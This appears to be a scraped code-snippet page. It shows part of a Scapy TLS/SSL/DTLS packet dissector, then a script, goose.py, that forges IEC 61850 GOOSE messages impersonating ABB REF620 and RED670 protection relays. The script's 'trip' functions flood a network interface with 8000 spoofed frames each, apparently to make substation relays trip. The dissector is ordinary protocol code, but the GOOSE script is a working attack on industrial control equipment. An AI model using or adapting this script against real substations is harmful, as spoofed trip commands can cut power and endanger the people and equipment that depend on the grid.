43:"BAD_CERTIFICATE",162 43:"UNSUPPORTED_CERTIFICATE",163 44:"CERTIFICATE_REVOKED",164 45:"CERTIFICATE_EXPIRED",165 46:"CERTIFICATE_UNKNOWN",166 47:"ILLEGAL_PARAMETER",167 48:"UNKNOWN_CA",168 49:"ACCESS_DENIED",169 50:"DECODE_ERROR",170 51:"DECRYPT_ERROR",171 60:"EXPORT_RESTRICTION_RESERVED",172 70:"PROTOCOL_VERSION",173 71:"INSUFFICIENT_SECURITY",174 86:"INAPPROPRIATE_FALLBACK",175 80:"INTERNAL_ERROR",176 90:"USER_CANCELED",177 100:"NO_RENEGOTIATION",178 110:"UNSUPPORTED_EXTENSION",179 111:"CERTIFICATE_UNOBTAINABLE",180 112:"UNRECOGNIZED_NAME",181 113:"BAD_CERTIFICATE_STATUS_RESPNSE",182 114:"BAD_CERTIFICATE_HASH_VALUE",183 255:"UNKNOWN_255", }184TLS_EXT_MAX_FRAGMENT_LENGTH_ENUM = {185 0x01: 2 ** 9,186 0x02: 2 ** 10,187 0x03: 2 ** 11,188 0x04: 2 ** 12,189 0xff: 'unknown',190 }191class TLSCipherSuite:192 '''193 make ciphersuites available as class props (autocompletion)194 '''195 NULL_WITH_NULL_NULL = 0x0000196 RSA_WITH_NULL_MD5 = 0x0001197 RSA_WITH_NULL_SHA1 = 0x0002198 RSA_WITH_NULL_SHA256 = 0x003b199 RSA_WITH_3DES_EDE_CBC_SHA = 0x000a200 DHE_RSA_WITH_3DES_EDE_CBC_SHA = 0x0016 201 DHE_DSS_WITH_3DES_EDE_CBC_SHA = 0x0013202 RSA_WITH_3DES_EDE_CBC_SHA = 0x000a203 DHE_RSA_WITH_AES_128_CBC_SHA = 0x0033204 DHE_DSS_WITH_AES_128_CBC_SHA = 0x0032205 RSA_WITH_AES_128_CBC_SHA = 0x002f206 RSA_WITH_IDEA_CBC_SHA = 0x0007207 DHE_DSS_WITH_RC4_128_SHA = 0x0066208 RSA_WITH_RC4_128_SHA = 0x0005209 RSA_WITH_RC4_128_MD5 = 0x0004210 DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA = 0x0063211 RSA_EXPORT1024_WITH_DES_CBC_SHA = 0x0062212 RSA_EXPORT1024_WITH_RC2_CBC_56_MD5 = 0x0061213 DHE_RSA_WITH_DES_CBC_SHA = 0x0015214 DHE_DSS_WITH_DES_CBC_SHA = 0x0012215 RSA_WITH_DES_CBC_SHA = 0x0009216 DHE_DSS_EXPORT1024_WITH_RC4_56_SHA = 0x0065217 RSA_EXPORT1024_WITH_RC4_56_SHA = 0x0064218 RSA_EXPORT1024_WITH_RC4_56_MD5 = 0x0060219 DHE_RSA_EXPORT_WITH_DES40_CBC_SHA = 0x0014220 DHE_DSS_EXPORT_WITH_DES40_CBC_SHA = 0x0011221 RSA_EXPORT_WITH_DES40_CBC_SHA = 0x0008222 RSA_EXPORT_WITH_RC2_CBC_40_MD5 = 0x0006223 RSA_EXPORT_WITH_RC4_40_MD5 = 0x0003224 RSA_WITH_AES_256_CBC_SHA = 0x0035225 DHE_DSS_WITH_AES_256_CBC_SHA = 0x0038 226 DHE_RSA_WITH_AES_256_CBC_SHA = 0x0039227 ECDHE_ECDSA_WITH_AES_256_CBC_SHA = 0xc00a228 ECDH_RSA_WITH_AES_256_CBC_SHA = 0xc00f 229 ECDHE_RSA_WITH_AES_256_CBC_SHA = 0xc014230 SRP_SHA_RSA_WITH_AES_256_CBC_SHA = 0xc021231 SRP_SHA_DSS_WITH_AES_256_CBC_SHA = 0xc022232 DHE_DSS_WITH_CAMELLIA_256_CBC_SHA = 0x0087233 DHE_RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0088234 ECDH_ECDSA_WITH_AES_256_CBC_SHA = 0xc005235 RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0084236 TLS_FALLBACK_SCSV = 0x5600237 238TLS_CIPHER_SUITES = dict((v, k) for k, v in TLSCipherSuite.__dict__.items() if not k.startswith("__"))239class TLSCompressionMethod:240 '''241 make compression methods available as class props (autocompletion)242 '''243 NULL = 0x00244 DEFLATE = 0x01245 246TLS_COMPRESSION_METHODS = dict((v, k) for k, v in TLSCompressionMethod.__dict__.items() if not k.startswith("__"))247class TLSRecord(Packet):248 name = "TLS Record"249 fields_desc = [ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),250 XShortEnumField("version", 0x0301, TLS_VERSIONS),251 XLenField("length", None, fmt="!H"), ]252 253class TLSCiphertext(Packet):254 name = "TLS Ciphertext Fragment"255 fields_desc = [ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),256 XShortEnumField("version", 0x0301, TLS_VERSIONS),257 XLenField("length", None, fmt="!H"), ]258class TLSCiphertextDecrypted(Packet):259 name = "TLS Ciphertext Decrypted"260 fields_desc = [ StrField("data", None, fmt="H")]261class TLSCiphertextMAC(Packet):262 name = "TLS Ciphertext MAC"263 fields_desc = [ StrField("mac", None, fmt="H")]264 265class TLSCompressed(Packet):266 name = "TLS Compressed Fragment"267 fields_desc = [ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),268 XShortEnumField("version", 0x0301, TLS_VERSIONS),269 XLenField("length", None, fmt="!H"), ]270 271class TLSPlaintext(Packet):272 name = "TLS Plaintext"273 fields_desc = [ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),274 XShortEnumField("version", 0x0301, TLS_VERSIONS),275 XLenField("length", None, fmt="!H"), ]276 277class TLSHandshake(Packet):278 name = "TLS Handshake"279 fields_desc = [ByteEnumField("type", 0xff, TLS_HANDSHAKE_TYPES),280 XBLenField("length", None, fmt="!I", numbytes=3), ]281class TLSServerName(Packet):282 name = "TLS Servername"283 fields_desc = [ByteEnumField("type", 0x00, {0x00:"host"}),284 XFieldLenField("length", None, length_of="data", fmt="H"),285 StrLenField("data", "", length_from=lambda x:x.length),286 ]287 288class TLSServerNameIndication(Packet):289 name = "TLS Extension Servername Indication"290 fields_desc = [XFieldLenField("length", None, length_of="server_names", fmt="H"),291 PacketListField("server_names", None, TLSServerName, length_from=lambda x:x.length),292 ]293class TLSExtension(Packet):294 name = "TLS Extension"295 fields_desc = [XShortEnumField("type", 0x0000, TLS_EXTENSION_TYPES),296 XLenField("length", None, fmt="!H"),297 ]298 def extract_padding(self, s):299 return s[:self.length],s[self.length:]300# https://www.ietf.org/rfc/rfc3546.txt301class TLSExtMaxFragmentLength(Packet):302 name = "TLS Extension Max Fragment Length"303 fields_desc = [ByteEnumField("max_fragment_length", 0xff, TLS_EXT_MAX_FRAGMENT_LENGTH_ENUM)]304 305 def extract_padding(self, s):306 return '', s307 308CERT_CHAIN_TYPE = { 0x00: 'individual_certs',309 0x01: 'pkipath',310 0xff: 'unknown'}311TLS_TYPE_BOOLEAN = {0x00: 'false',312 0x01: 'true'}313class TLSURLAndOptionalHash(Packet):314 name = "TLS Extension Certificate URL/Hash"315 fields_desc = [XFieldLenField("url_length", None, length_of="url", fmt="H"),316 StrLenField("url", "", length_from=lambda x:x.url_length),317 ByteEnumField("hash_present", 0x00, TLS_TYPE_BOOLEAN),318 StrLenField("sha1hash", "", length_from=lambda x:20 if x.hash_present else 0), # opaque SHA1Hash[20];319 ]320 321class TLSExtCertificateURL(Packet):322 name = "TLS Extension Certificate URL"323 fields_desc = [ByteEnumField("type", 0xff, CERT_CHAIN_TYPE),324 XFieldLenField("length", None, length_of="certificate_urls", fmt="H"),325 PacketListField("certificate_urls", None, TLSURLAndOptionalHash, length_from=lambda x:x.length)326 ]327 def extract_padding(self, s):328 return '', s329TLS_EXT_EC_POINT_FORMATS = {0x00:'uncompressed',330 0x01:'ansiX962_compressed_prime',331 0x02:'ansiX962_compressed_char2'}332class TLSExtECPointsFormat(Packet):333 name = "TLS Extension EC Points Format"334 fields_desc = [335 XFieldLenField("length", None, length_of="ec_point_formats", fmt="B"),336 FieldListField("ec_point_formats", None, ByteEnumField("ec_point_format", None, TLS_EXT_EC_POINT_FORMATS), length_from=lambda x:x.length),337 ]338 def extract_padding(self, s):339 return '', s340TLS_EXT_ELLIPTIC_CURVES = {0x000e:'sect571r1',341 }342class TLSExtEllipticCurves(Packet):343 name = "TLS Extension Elliptic Curves"344 fields_desc = [345 XFieldLenField("length", None, length_of="elliptic_curves", fmt="H"),346 FieldListField("elliptic_curves", None, ShortEnumField("elliptic_curve", None, TLS_EXT_ELLIPTIC_CURVES), length_from=lambda x:x.length),347 ]348 def extract_padding(self, s):349 return '', s350 351class TLSExtHeartbeat(Packet):352 name = "TLS Extension HeartBeat"353 fields_desc = [StrFixedLenField("mode", 0x01, 0x01)354 ]355 def extract_padding(self, s):356 return '', s357 358class TLSClientHello(Packet):359 name = "TLS Client Hello"360 fields_desc = [XShortEnumField("version", 0x0301, TLS_VERSIONS),361 IntField("gmt_unix_time", int(time.time())),362 StrFixedLenField("random_bytes", os.urandom(28), 28),363 XFieldLenField("session_id_length", None, length_of="session_id", fmt="B"),364 StrLenField("session_id", '', length_from=lambda x:x.session_id_length),365 366 XFieldLenField("cipher_suites_length", None, length_of="cipher_suites", fmt="H"),367 FieldListField("cipher_suites", None, XShortEnumField("cipher", None, TLS_CIPHER_SUITES), length_from=lambda x:x.cipher_suites_length),368 369 XFieldLenField("compression_methods_length", None, length_of="compression_methods", fmt="B"),370 FieldListField("compression_methods", None, ByteEnumField("compression", None, TLS_COMPRESSION_METHODS), length_from=lambda x:x.compression_methods_length),371 372 XFieldLenField("extensions_length", None, length_of="extensions", fmt="H"),373 PacketListField("extensions", None, TLSExtension, length_from=lambda x:x.extensions_length),374 ] 375 376class TLSServerHello(Packet):377 name = "TLS Server Hello"378 fields_desc = [XShortEnumField("version", 0x0301, TLS_VERSIONS),379 IntField("gmt_unix_time", int(time.time())),380 StrFixedLenField("random_bytes", os.urandom(28), 28),381 XFieldLenField("session_id_length", None, length_of="session_id", fmt="B"),382 StrLenField("session_id", '', length_from=lambda x:x.session_id_length),383 XShortEnumField("cipher_suite", 0x0000, TLS_CIPHER_SUITES),384 ByteEnumField("compression_method", 0x00, TLS_COMPRESSION_METHODS),385 XFieldLenField("extensions_length", None, length_of="extensions", fmt="H"),386 PacketListField("extensions", None, TLSExtension, length_from=lambda x:x.extensions_length),387 ]388class TLSAlert(Packet):389 name = "TLS Alert"390 fields_desc = [ByteEnumField("level", 0xff, TLS_ALERT_LEVELS),391 ByteEnumField("description", 0xff, TLS_ALERT_DESCRIPTIONS),392 ]393class TLSHeartBeat(Packet):394 name = "TLS Extension HeartBeat"395 fields_desc = [ByteEnumField("type", 0x01, {0x01:"request"}),396 FieldLenField("length", None, length_of="data", fmt="H"),397 StrLenField("data", "", length_from=lambda x:x.length),398 StrLenField("padding", "", length_from=lambda x: 'P' * (16 - x.length)),399 ]400class TLSClientKeyExchange(Packet):401 name = "TLS Client Key Exchange"402 fields_desc = [ XBLenField("length", None, fmt="!H",) ]403class TLSServerKeyExchange(Packet):404 name = "TLS Client Key Exchange"405 fields_desc = [ XBLenField("length", None, fmt="!H") ]406 407class TLSKexParamEncryptedPremasterSecret(Packet):408 name = "TLS Kex encrypted PreMasterSecret"409 fields_desc = [ # FieldLenField("length",None,length_of="data",fmt="H"),410 StrLenField("data", None) ]411class TLSKexParamDH(Packet):412 name = "TLS Kex DH Params"413 fields_desc = [ # FieldLenField("length",None,length_of="data",fmt="H"),414 StrLenField("data", None) ]415class TLSFinished(Packet):416 name = "TLS Handshake Finished"417 fields_desc = [ # FieldLenField("length",None,length_of="data",fmt="H"),418 StrLenField("data", None) ]419 420 def xbuild(self, master_secret, finished_label, hash_handshake_messages):421 '''422 master_secret423 finished_label = ['client finished','server finished']424 hash_handshake_messages 425 '''426 self.data = ssl_tls_crypto.prf(master_secret, finished_label, hash_handshake_messages)427class TLSDHServerParams(Packet):428 name = "TLS Diffie-Hellman Server Params"429 fields_desc = [XFieldLenField("p_length", None, length_of="p", fmt="!H"),430 StrLenField("p", '', length_from=lambda x:x.p_length),431 XFieldLenField("g_length", None, length_of="g", fmt="!H"),432 StrLenField("g", '', length_from=lambda x:x.g_length),433 XFieldLenField("pubkey_length", None, length_of="pubkey", fmt="!H"),434 StrLenField("pubkey", '', length_from=lambda x:x.pubkey_length),435 XFieldLenField("signature_length", None, length_of="signature", fmt="!H"),436 StrLenField("signature", '', length_from=lambda x:x.signature_length), ]437 438class TLSServerHelloDone(Packet):439 name = "TLS Server Hello Done"440 fields_desc = [ XBLenField("length", None, fmt="!I", numbytes=3),441 StrLenField("data", "", length_from=lambda x:x.length), ]442class TLSCertificate(Packet):443 name = "TLS Certificate"444 fields_desc = [ XBLenField("length", None, length_of="data", fmt="!I", numbytes=3),445 StrLenField("data", "", length_from=lambda x:x.length), ] # BERcodec_Object.dec(data,context=ASN1_Class_X509)446 447 def extract_padding(self,s):448 return s[self.length:],s[:self.length]449 450class TLSCertificateList(Packet):451 name = "TLS Certificate List"452 fields_desc = [453 XBLenField("length", None, length_of="certificates", fmt="!I", numbytes=3),454 PacketListField("certificates", None, TLSCertificate, length_from=lambda x:x.length),455 ] 456 def extract_padding(self,s):457 return s[self.length:],s[:self.length] 458class TLSChangeCipherSpec(Packet):459 name = "TLS ChangeCipherSpec"460 fields_desc = [ StrField("message", '\x01', fmt="H")]461class xTLSCiphertext(Packet):462 name = "TLS Ciphertext"463 fields_desc = [ StrField("data", None, fmt="H"),464 StrField("mac", None, fmt="H")]465 466 def encrypt(self, record):467 # t = record[TLSRecord]468 469 # compute MAC470 # encrypt DATA+MAC471 self.data = str(record)472 return self473 474 def decrypt(self):475 return TLSRecord()476 477class xTLSPlaintext(Packet):478 name = "TLS Plaintext"479 fields_desc = [ StrField("data", None, fmt="H") ]480 ptr_methods = {'default': {'encode': lambda x:x, # NULL481 'decode': lambda x:x},482 TLSCompressionMethod.DEFLATE: {'encode': lambda x:x.encode('zlib'),483 'decode': lambda x:x.decode('zlib')},484 }485 486 def compress(self, method, data=None):487 self.method = method488 data = data or self.data489 return TLSCompressed(self.ptr_methods.get(self.method, self.ptr_methods['default'])['encode'](data))490 491 492class xTLSCompressed(Packet):493 name = "TLS Compressed"494 fields_desc = [ StrField("data", None, fmt="H") ]495 496 ptr_methods = {'default': {'encode': lambda x:x,497 'decode': lambda x:x},498 TLSCompressionMethod.DEFLATE: {'encode': lambda x:x.encode('zlib'),499 'decode': lambda x:x.decode('zlib')},500 }501 502 def decompress(self, method, data=None):503 self.method = method504 data = data or self.data505 506 return TLSRecord(self.ptr_methods.get(self.method, self.ptr_methods['default'])['decode'](data))507 508class DTLSRecord(Packet):509 name = "DTLS Record"510 fields_desc = [ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),511 XShortEnumField("version", 0x0301, TLS_VERSIONS),512 ShortField("epoch", None),513 XBLenField("sequence", None, fmt="!Q", numbytes=6),514 XLenField("length", None, fmt="!H"), ]515class DTLSHandshake(Packet):516 name = "DTLS Handshake"517 fields_desc = TLSHandshake.fields_desc + [518 ShortField("sequence", None),519 XBLenField("fragment_offset", None, fmt="!I", numbytes=3),520 XBLenField("length", None, fmt="!I", numbytes=3),521 ]522class DTLSClientHello(Packet):523 name = "DTLS Client Hello"524 fields_desc = [XShortEnumField("version", 0xfeff, TLS_VERSIONS),525 IntField("gmt_unix_time", int(time.time())),526 StrFixedLenField("random_bytes", os.urandom(28), 28),527 XFieldLenField("session_id_length", None, length_of="session_id", fmt="B"),528 StrLenField("session_id", '', length_from=lambda x:x.session_id_length),529 530 XFieldLenField("cookie_length", None, length_of="cookie", fmt="B"),531 StrLenField("cookie", '', length_from=lambda x:x.cookie_length),532 533 XFieldLenField("cipher_suites_length", None, length_of="cipher_suites", fmt="H"),534 FieldListField("cipher_suites", None, XShortEnumField("cipher", None, TLS_CIPHER_SUITES), length_from=lambda x:x.cipher_suites_length),535 536 XFieldLenField("compression_methods_length", None, length_of="compression_methods", fmt="B"),537 FieldListField("compression_methods", None, ByteEnumField("compression", None, TLS_COMPRESSION_METHODS), length_from=lambda x:x.compression_methods_length),538 539 XFieldLenField("extensions_length", None, length_of="extensions", fmt="H"),540 PacketListField("extensions", None, TLSExtension, length_from=lambda x:x.extension_length),541 ] 542 543SSLv2_CERTIFICATE_TYPES = { 0x01: 'x.509'}544class DTLSHelloVerify(Packet):545 name = "DTLS Hello Verify"546 fields_desc = [XShortEnumField("version", 0xfeff, TLS_VERSIONS),547 XFieldLenField("cookie_length", None, length_of="cookie", fmt="B"),548 StrLenField("cookie", '', length_from=lambda x:x.cookie_length),549 ]550 551 552SSLv2_MESSAGE_TYPES = {0x01:'client_hello',553 0x04: 'server_hello',554 0x02: 'client_master_key'}555class SSLv2CipherSuite:556 '''557 make ciphersuites available as class props (autocompletion)558 '''559 DES_192_EDE3_CBC_WITH_MD5 = 0x0700c0560 IDEA_128_CBC_WITH_MD5 = 0x050080561 RC2_CBC_128_CBC_WITH_MD5 = 0x030080562 RC4_128_WITH_MD5 = 0x010080563 RC4_64_WITH_MD5 = 0x080080564 DES_64_CBC_WITH_MD5 = 0x060040565 RC2_128_CBC_EXPORT40_WITH_MD5 = 0x040080566 RC4_128_EXPORT40_WITH_MD5 = 0x020080567 568SSL2_CIPHER_SUITES = dict((v, k) for k, v in SSLv2CipherSuite.__dict__.items() if not k.startswith("__"))569class SSLv2Record(Packet):570 name = "SSLv2 Record"571 fields_desc = [XBLenField("length", None, fmt="!H", adjust_i2m=lambda pkt, x: x + 0x8000 + 1, adjust_m2i=lambda pkt, x:x - 0x8000), # length=halfbyte+byte with MSB(high(1stbyte)) =1 || +1 for lengt(content_type)572 ByteEnumField("content_type", 0xff, SSLv2_MESSAGE_TYPES),573 ]574class SSLv2ClientHello(Packet):575 name = "SSLv2 Client Hello"576 fields_desc = [577 XShortEnumField("version", 0x0002, TLS_VERSIONS),578 XFieldLenField("cipher_suites_length", None, length_of="cipher_suites", fmt="H"),579 XFieldLenField("session_id_length", None, length_of="session_id", fmt="H"),580 XFieldLenField("challenge_length", None, length_of="challenge", fmt="H"),581 582 FieldListField("cipher_suites", None, XBEnumField("cipher", None, SSL2_CIPHER_SUITES, fmt="!I", numbytes=3), length_from=lambda x:x.cipher_suites_length),583 StrLenField("session_id", '', length_from=lambda x:x.session_id_length),584 StrLenField("challenge", '', length_from=lambda x:x.challenge_length),585 ]586 587 588SSLv2_CERTIFICATE_TYPES = { 0x01: 'x.509'}589class SSLv2ServerHello(Packet):590 name = "SSLv2 Server Hello"591 fields_desc = [592 ByteEnumField("session_id_hit", 0x00, TLS_TYPE_BOOLEAN),593 ByteEnumField("certificate_type", 0x01, SSLv2_CERTIFICATE_TYPES),594 XShortEnumField("version", 0x0002, TLS_VERSIONS),595 XFieldLenField("certificate_length", None, length_of="certificates", fmt="H"),596 XFieldLenField("cipher_suites_length", None, length_of="cipher_suites", fmt="H"),597 XFieldLenField("connection_id_length", None, length_of="connection_id", fmt="H"),598 599 StrLenField("certificates", '', length_from=lambda x:x.certificate_length),600 FieldListField("cipher_suites", None, XBEnumField("cipher", None, SSL2_CIPHER_SUITES, fmt="!I", numbytes=3), length_from=lambda x:x.cipher_suites_length),601 StrLenField("connection_id", '', length_from=lambda x:x.connection_id_length),602 ]603class SSLv2ClientMasterKey(Packet):604 name = "SSLv2 Client Master Key"605 fields_desc = [606 XBEnumField("cipher_suite", 0x0002, SSL2_CIPHER_SUITES, fmt="!I", numbytes=3), # fixme: 3byte wide607 XFieldLenField("clear_key_length", None, length_of="clear_key", fmt="H"),608 XFieldLenField("encrypted_key_length", None, length_of="encrypted_key", fmt="H"),609 XFieldLenField("key_argument_length", None, length_of="key_argument", fmt="H"),610 611 StrLenField("clear_key", '', length_from=lambda x:x.clear_key_length),612 StrLenField("encrypted_key", '', length_from=lambda x:x.clear_key_length),613 StrLenField("key_argument", '', length_from=lambda x:x.key_argument_length),614 ]615 616# entry class617class SSL(Packet):618 '''619 COMPOUND CLASS for SSL620 '''621 name = "SSL/TLS"622 fields_desc = [PacketListField("records", None, TLSRecord)]623 624 def pre_dissect(self, s):625 # figure out if we're UDP or TCP626 627 if self.underlayer and self.underlayer.haslayer(UDP):628 self.guessed_next_layer = DTLSRecord629 elif ord(s[0]) & 0x80:630 # SSLv2 Header631 self.guessed_next_layer = SSLv2Record632 else:633 self.guessed_next_layer = TLSRecord634 self.fields_desc = [PacketListField("records", None, self.guessed_next_layer)]635 return s636 def do_dissect(self, s):637 pos = 0638 cls = self.guessed_next_layer # FIXME: detect DTLS639 cls_len = len(cls())640 try:641 while pos <= len(s):642 # consume payloads and add them to records list643 record = cls(s[pos:], _internal=1) # FIXME: performance644 layer_len = cls_len + record.length645 if layer_len == None:646 break647 record = cls(s[pos:pos + layer_len])648 pos += layer_len649 # print pos,len(s)650 self.records.append(record)651 except Exception, e:652 pass653 # raise e654 return s[pos:]655 def encrypt(self, master_secret):656 pass657 658 def encrypt_stream(self):659 '''660 HMAC_hash(MAC_write_secret, seq_num + TLSCompressed.type +661 TLSCompressed.version + TLSCompressed.length +662 TLSCompressed.fragment));663 '''664 pass665 666 def decrypt(self, master_secret): pass667 668 def compress(self): pass669 def decompress(self): pass670 671# bind magic672bind_layers(TCP, SSL, dport=443)673bind_layers(TCP, SSL, sport=443)674bind_layers(UDP, SSL, dport=4433)675bind_layers(UDP, SSL, sport=4433)676# TLSRecord677bind_layers(TLSRecord, TLSChangeCipherSpec, {'content_type':0x14})678bind_layers(TLSRecord, TLSHeartBeat, {'content_type':0x18})679bind_layers(TLSRecord, TLSAlert, {'content_type':0x15})680bind_layers(TLSRecord, TLSHandshake, {'content_type':0x16})681# --> handshake proto682bind_layers(TLSHandshake, TLSClientHello, {'type':0x01})683bind_layers(TLSHandshake, TLSServerHello, {'type':0x02})684bind_layers(TLSHandshake, TLSCertificateList, {'type':0x0b})685bind_layers(TLSHandshake, TLSClientKeyExchange, {'type':0x10})686bind_layers(TLSHandshake, TLSServerKeyExchange, {'type':0x0c})687bind_layers(TLSHandshake, TLSFinished, {'type':0x20})688# <---689bind_layers(TLSServerKeyExchange, TLSKexParamEncryptedPremasterSecret)690bind_layers(TLSClientKeyExchange, TLSKexParamEncryptedPremasterSecret)691bind_layers(TLSServerKeyExchange, TLSKexParamDH)692bind_layers(TLSClientKeyExchange, TLSKexParamDH)693# --> extensions694bind_layers(TLSExtension, TLSServerNameIndication, {'type': 0x0000})695bind_layers(TLSExtension, TLSExtMaxFragmentLength, {'type': 0x0001})696bind_layers(TLSExtension, TLSExtCertificateURL, {'type': 0x0002})697bind_layers(TLSExtension, TLSExtECPointsFormat, {'type': 0x000b})698bind_layers(TLSExtension, TLSExtEllipticCurves, {'type': 0x000a})699# bind_layers(TLSExtension,Raw,{'type': 0x0023})700bind_layers(TLSExtension, TLSExtHeartbeat, {'type': 0x000f})701# <--702# DTLSRecord703bind_layers(DTLSRecord, DTLSHandshake, {'content_type':0x16})704bind_layers(DTLSHandshake, DTLSClientHello, {'type':0x01})705# SSLv2 706bind_layers(SSLv2Record, SSLv2ServerHello, {'content_type':0x04})707bind_layers(SSLv2Record, SSLv2ClientHello, {'content_type':0x01})...
goose.py
Source:goose.py
1from scapy.all import *2from scapy.layers.ntp import TimeStampField3import datetime4from binascii import unhexlify5INTERFACE = "Intel(R) Ethernet Connection (4) I219-V"6PACKET_QTY = 80007def num2str(num):8 bytestring = bytearray()9 if num // 256 // 256 // 256 // 256 % 256 > 0:10 bytestring.append(num // 256 // 256 // 256 // 256 % 256)11 if num // 256 // 256 // 256 % 256 > 0:12 bytestring.append(num // 256 // 256 // 256 % 256)13 if num // 256 // 256 % 256 > 0:14 bytestring.append(num // 256 // 256 % 256)15 if num // 256 % 256 > 0:16 bytestring.append(num // 256 % 256)17 bytestring.append(num % 256)18 return bytestring19class GooseHeader(Packet):20 name = "Goose Header"21 fields_desc = [ShortField("appid", 1),22 ShortField("length", 0),23 ShortField("reserved1", None),24 ShortField("reserved2", None)]25class GoosePDU(Packet):26 name = "Goose PDU"27 fields_desc = [ByteField("sequence_t", 0x61),28 ConditionalField(ByteField("sequence_el", 0x81), lambda pkt: pkt.sequence_l > 127),29 ByteField("sequence_l", 0),30 ByteField("gocbRef_t", 0x80),31 FieldLenField("gocbRef_l", None, length_of="gocbRef", fmt="B"),32 StrLenField("gocbRef", None, length_from=lambda pkt:pkt.gocbRef_l),33 ByteField("timeAllowedtoLive_t", 0x81),34 FieldLenField("timeAllowedtoLive_l", None, length_of="timeAllowedtoLive", fmt="B"),35 StrLenField("timeAllowedtoLive", None, length_from=lambda pkt:pkt.timeAllowedtoLive_l),36 ByteField("datSet_t", 0x82),37 FieldLenField("datSet_l", None, length_of="datSet", fmt="B"),38 StrLenField("datSet", None, length_from=lambda pkt: pkt.datSet_l),39 ByteField("goID_t", 0x83),40 FieldLenField("goID_l", None, length_of="goID", fmt="B"),41 StrLenField("goID", None, length_from=lambda pkt: pkt.goID_l),42 ByteField("T_t", 0x84),43 ByteField("T_l", 8),44 TimeStampField("T", None),45 ByteField("stNum_t", 0x85),46 FieldLenField("stNum_l", None, length_of="stNum", fmt="B"),47 StrLenField("stNum", None, length_from=lambda pkt: pkt.stNum_l),48 ByteField("sqNum_t", 0x86),49 FieldLenField("sqNum_l", None, length_of="sqNum", fmt="B"),50 StrLenField("sqNum", None, length_from=lambda pkt: pkt.sqNum_l),51 ByteField("simulation_t", 0x87),52 ByteField("simulation_l", 1),53 ByteField("simulation", None),54 ByteField("confRev_t", 0x88),55 FieldLenField("confRev_l", None, length_of="confRev", fmt="B"),56 StrLenField("confRev", None, length_from=lambda pkt: pkt.confRev_l),57 ByteField("ndsCom_t", 0x89),58 ByteField("ndsCom_l", 1),59 ByteField("ndsCom", None),60 ByteField("numDatSetEntries_t", 0x8a),61 FieldLenField("numDatSetEntries_l", None, length_of="numDatSetEntries", fmt="B"),62 StrLenField("numDatSetEntries", None, length_from=lambda pkt: pkt.numDatSetEntries_l)63 ]64def ref620_packet():65 ethernet_mac = Ether(src='00:21:c1:50:52:95', dst='01:0c:cd:01:00:01', type=0x88b8)66 goose_pdu = GoosePDU(gocbRef="ABBREF620LD0/LLN0$GO$Control_DataSet",67 timeAllowedtoLive=num2str(2200),68 datSet="ABBREF620LD0/LLN0$Dataset_GOOSE",69 goID="ABBREF620/LD0/LLN0/Control_DataSet",70 T=datetime.datetime.now(datetime.timezone.utc).timestamp(),71 stNum=num2str(444),72 sqNum=num2str(0),73 simulation=0,74 confRev=num2str(20400),75 ndsCom=0,76 numDatSetEntries=num2str(2)77 )78 goose_data = unhexlify("ab088301018403030000")79 goose_pdu.sequence_l = (len(goose_pdu)+len(goose_data)-2)80 goose_header = GooseHeader(appid=12289, length=len(goose_pdu)+len(goose_data)+8)81 goose_packet = ethernet_mac / goose_header / goose_pdu / goose_data82 return goose_packet83def red670_packet():84 ethernet_mac = Ether(src='00:00:23:2d:24:05', dst='01:0c:cd:01:00:00', type=0x88b8)85 goose_pdu = GoosePDU(gocbRef="ABBRED670LD0/LLN0$GO$gcbGOOSE",86 timeAllowedtoLive=num2str(11000),87 datSet="ABBRED670LD0/LLN0$GOOSE",88 goID="ABBRED670LD0/LLN0.gcbGOOSE",89 T=datetime.datetime.now(datetime.timezone.utc).timestamp(),90 stNum=num2str(1),91 sqNum=num2str(0),92 simulation=0,93 confRev=num2str(100),94 ndsCom=0,95 numDatSetEntries=num2str(2)96 )97 goose_data = unhexlify("ab088301018403030000")98 goose_pdu.sequence_l = (len(goose_pdu) + len(goose_data) - 2)99 goose_header = GooseHeader(appid=12290, length=len(goose_pdu) + len(goose_data)+8)100 goose_packet = ethernet_mac / goose_header / goose_pdu / goose_data101 return goose_packet102def ref620_trip():103 pkt = ref620_packet()104 for i in range(PACKET_QTY):105 sendp(pkt, iface=INTERFACE)106 return "DONE"107def red670_trip():108 pkt = red670_packet()109 for i in range(PACKET_QTY):110 sendp(pkt, iface=INTERFACE)111 return "DONE"112def all_trip():113 pkt1 = ref620_packet()114 pkt2 = red670_packet()115 for i in range(PACKET_QTY):116 sendp(pkt1, iface=INTERFACE)117 sendp(pkt2, iface=INTERFACE)118 return "DONE"119if __name__ == '__main__':120 print("GOOSE packet for Scapy by Sever Sudakov")...
Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.
You could also refer to video tutorials over LambdaTest YouTube channel to get step by step demonstration from industry experts.
Get 100 minutes of automation test minutes FREE!!